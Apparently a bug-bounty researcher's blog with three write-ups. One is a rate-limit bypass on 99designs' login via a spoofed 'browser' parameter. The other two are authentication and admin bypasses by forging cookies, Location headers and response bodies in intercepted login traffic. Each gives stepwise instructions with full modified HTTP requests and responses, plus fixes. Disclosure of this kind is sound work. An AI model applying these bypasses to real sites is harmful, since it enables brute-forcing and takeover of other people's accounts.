A Way to Bypass Rate Limiting

Another Way to Bypass Rate Limiting

I want to share one of my finding on account.99designs.com which I have reported to them on 5th May 2014.

I have found that site.com following Url https://account.99designs.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= was vulnerable to Bruteforce attacks even when the Rate-Limting is implement for all the site.com users account and the server is disabling the requests.

So first I tried to do the Status Code Value or Response Code Value, Length Code Analysis but it was same as 200 for all Right & Wrong Password attempts as we hit the 60 Wrong Password Attempts also the error message was generic for all Right & Wrong Password Attempts.

Then I tried to do the User-Agent based bruteforce attack by changing the user-agent to known and anonymous user-agent in header of the each request but it also failed and then after further more Deep Analysis I found that there was a parameter named browser was sent using post method in each request with Wrong or Right Password and this parameter was containing a value which was the currently used browsers name i.e. internet+explorer. So, that means the server was checking the User-Agent using header and also using the browser name parameter and its value internet+explorer.

So to find weakness in the Rate Limiting countermeasure 1st sent more then 60 Wrong Password requests using  the browser parameter with the value internet+explorer as the 60 Wrong Password requests sent the the Rate Limiting got enabled and it started blocking the wrong or right password request and was sending the response code and length code as 200 for all Right & Wrong Password attempts also the error message was generic for all Right & Wrong Password Attempts so again it failed. 

After that I started sending each request with the browser named parameter value which I changed to any known and also any unknown value as browser name value. So, then I observed that after more then 60 Wrong Password Attempts and also even after more then 10000 Wrong Passwords Attempts the Rate Limiting didn't got enabled nor the Status Code Value or Response Code Value, Length Code values changed to 200. Instead for Right Password it was 302 and for Wrong Pass it was 200.

So, in this way I was able to Bypass the site.com Rate Limting by changing the browser parameter value in each request and by analyzing the Status Code Value or Response Code Value, Length Code values differences.

Original Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH

Modified Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH

In this way the attacker was able to Bypass the Rate Limiting of 99designs.


Impact:

The attacker can successfully bruteforce the passwords on any users account even when the rate limiting is enabled and this can lead to account compromise.

Recommendation:
The Length Code Value for Right & Wrong Passwords shall always be Same for Any Users Account.

Instead of user-agent based validation for enabling the rate limiting user id shall be checked for numbers of wrong password attempts.


The account shall only be unlocked using a email which contains a Un-Lock account link.

The vulnerability was mitigated by 99designs Security Team.

So in this way, one can Bypass Rate Limiting and can also compromise the victims account also this technique can be used to find same type of vulnerabilities on different websites.

Suggestions and Feedback's are welcome.

Authentication Bypass & Privilege Escalation Using Header Manipulation & Cookie Injection

A Way to Bypass Authentication & Gain Admin Privilege Using Login Validation Process Prediction

While researching and working on bug bounties in Feb 2013, I have found a way that Using Header Manipulation & Cookie Injection we can Bypass Authentication and can gain Admin Privilege and using this vulnerability we can Takeover all the users account of a website if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can predict the login validation process for any admins account by combinding various techniques and in this way he can also Bypass Authentication of all passwords of all the Admin accounts and can successfully compromise the Admins account as the login validation process is predictable by the attacker.

I tried various techniques to Bypass the Login like Arbitrary Methods Usages, Cookies Manipulation, Status Code Value Modification, Response Code Modification but all these techniques failed so the challenge was to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass the Admin Authentication.

Please Note: There was a precondition that an attacker shall know the admins login email id only. This can be done using forget password or even using login Url itself.

Steps to Execute the Attack:

For login validation process analysis I created 2 test accounts.

1. 1st we will send the login request using our own account attackerloginid@testsite.com with a wrong password while intercepting the response for the wrong password using the below mentioned login link.  

https://testsite.com/user/login

2. Using which I found that if the password is wrong then the server response code is 302 Found, 1st Set-Cookie named remember_email value is null and 2nd Set-Cookie named registration_status value is unregistereduser and the Location header value is as site login page Url https://testsite.com/user/login.

3. Now we will send the login request using our own account attackerloginid@testsite.com with a right password while intercepting the response for the right password using the below mentioned login link.  

https://testsite.com/user/login

4. Using which I found that if the password is right then the server response code is 302 Found, 1st Set-Cookie named remember_email value is attackerloginid@testsite.com and 2nd Set-Cookie named registration_status value is registereduser and the Location header value is as site Dashborad page Url https://testsite.com/user/accounts/dashboard.

5. As now we are able to find the variation between the wrong and right passwords server responses so we know we can Predict the Login Validation Process for the right password for any victims account and also for the Admin account.

So in simple words now the attacker will try to login into the victims account using the login Url and victims user id or login email id which is victimloginid@testsite.com with a wrong password while intercepting the response using any web proxy and he will get the server response code as 302 Found with a 1st Set-Cookie named remember_email with null as value and 2nd Set-Cookie named registration_status with a unregistereduser as value and with the Location header value as site Is User login page Url https://testsite.com/user/login.

So now the attacker will add the 1st Set-Cookie named remember_email with a victimloginid@testsite.com as value and 2nd Set-Cookie named registration_status with a registereduser as value and with the Location header value as site User Dashboard page Url https://testsite.com/user/accounts/dashboard and forward the request using any web proxy, now the attacker successfully logs into the victims account.

Now to Bypass the Admins login Authentication in same way  the attacker will add the 1st Set-Cookie named remember_email with a adminloginid@testsite.com as value and 2nd Set-Cookie named registration_status with a registeredadmin as value and with the Location header value as site Admin Dashboard page Url https://testsite.com/admin/accounts/dashboard and forward the request using any web proxy, now the attacker successfully logs into the Admins account and gains the Admin Privilege.

So in this way we can easily Bypass the Admin Authentication as well an Users Athentication :).

Key Points: registration_status cookie value unregistereduser is for a user with wrong password, registereduser id for a user with right password and registeredadmin is for the admin user with right password.

Attacker's Login ID: attackerloginid@testsite.com

Victim's Login ID: victimloginid@testsite.com

Admin's Login ID: adminloginid@testsite.com

Original Server Response Using Attacker's Account with Wrong Password:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:30:09 GMT
Location: https://testsite.com/user/login
Set-Cookie: remember_email=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=unregistereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive

Original Response Using Attacker's Account with Right Password:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:32:22 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=attackerloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive


Modified Response in which the attacker modified Set-Cookie & its Value, Status, Location Header and its Value and Sent it as a Request to Bypass Victims Login:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:35:43 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=victimloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive

Modified Response in which the attacker modified Set-Cookie & its Value, Status, Location Header and its Value and Sent it as a Request to Bypass Victims Login:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:40:14 GMT
Location: https://testsite.com/admin/accounts/dashboard
Set-Cookie: remember_email=adminloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registeredadmin; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive

Impact: 

The Login Validation Process is Predictable using which an attacker can easily compromise Admins account and any other users account of the Application.

Recommendation:  

The Login Validation shall not be dependent on Cookies Values and Location Header values combination and the Privileges shall not be granted on the basis of cookie values. Also the it shall not be dependent on the Client-Side Validation instead proper Server-Side Validation shall be done for the Correct Passwords.

So in this way one can Takeover or Bypass the authentication of Admins account as well as any users victims accounts using the Using Admin Login Validation Process Prediction also this way can be used to find same type of vulnerabilities on many different websites.

Suggestions and Feedbacks are welcome.

A Way to Bypass Authentication

Authentication Bypass Using Login Validation Process Prediction

While researching and working on bug bounties in late Dec 2012, I have found a way to Bypass Authentication  using which we can Takeover all the users account of a website if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can predict the login validation process for any victims account by combinding various techniques and in this way he can also Bypass Authentication of all passwords of all the accounts and can successfully compromise the victims account as the login validation process is predictable by the attacker.

I tried various techniques to Bypass the Login like Response Code Modification, Arbitrary Methods Usages but all these techniques failed so the challenge was to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass the Authentication.

Please Note: There was a precondition that an attacker shall now the victims login id or user id only.

Steps to Execute the Attack:

For login validation process analysis I created 2 test accounts.

1. 1st we will send the login request using our own account attackerloginid with a wrong password while intercepting the response for the wrong password using the below mentioned login link.  

https://testsite.com/login.jsp

2. Using which I found that if the password is wrong then the server response code is 200 OK, Set-Cookie named pstoken value is null which is generated once and the status code value is json based as following {"failed":false}.

3. Now the we will send the login request using our own account attackerloginid with a right password while intercepting the response for the right password using the below mentioned login link.  

https://testsite.com/login.jsp

4. Using which I found that if the password is right then the server response code is 302 Found, Set-Cookie named pstoken value is attackers user id or login id md5 hash value is 636559678682db9e21c958a4df44eea4 which is generated twice and the status code value is json based as following {"success":true}.

5. As now we are able to find the variation between the wrong and right passwords server responses so you now we can Predict the Login Validation Process for the right password.

So in simple words now the attacker will try to login into the victims account using the login Url and victims user id or login id which is victimloginid with a wrong password while intercepting the response using any web proxy and he will get the server response code as 200 OK with a Set-Cookie named pstoken with a null value which is generated once and with a status code value in json as following {"failed":false}.

So now the attacker will modify the response code value 200 OK to 302 Found, will add the Set-Cookie twice which is named as pstoken whose value he will change from null to victims user id or login id md5 hash value which is e9fc2abd9060fde1a67e3367b7d64bd0 and after that he will modify the status code value from {"failed":false} to {"success":true} and forward the request using any web proxy, now the attacker successfully logs into the victims account.

So in this way we can easily Bypass the Authentication :).

Attackers Login ID: attackerloginid md5 hash value:

636559678682db9e21c958a4df44eea4

Victims Login ID: victimloginid md5 hash value:

e9fc2abd9060fde1a67e3367b7d64bd0

Original Server Response Using Attackers Account with Wrong Password:

HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"failed":false}


Original Response Using Attackers Account with Right Password:

HTTP/1.1 302 Found
Date: Wed,  7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}

Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request:

HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}

Impact: 

The Login Validation Process is Predictable using which an attacker can easily compromise any users account of the Application.

Recommendation:  

The Login Validation shall not be dependent on Response Code Values, Cookies Values and Json Based Status Code values etc combination. Also the it shall not be dependent on the Client-Side Validation instead proper Server-Side Validation shall be done for the Correct Passwords.

So in this way one can Takeover or Bypass the authentication of any victims accounts using the Using Login Validation Process Prediction also this way can be used to find same type of vulnerabilities on many different websites.

Suggestions and Feedbacks are welcome.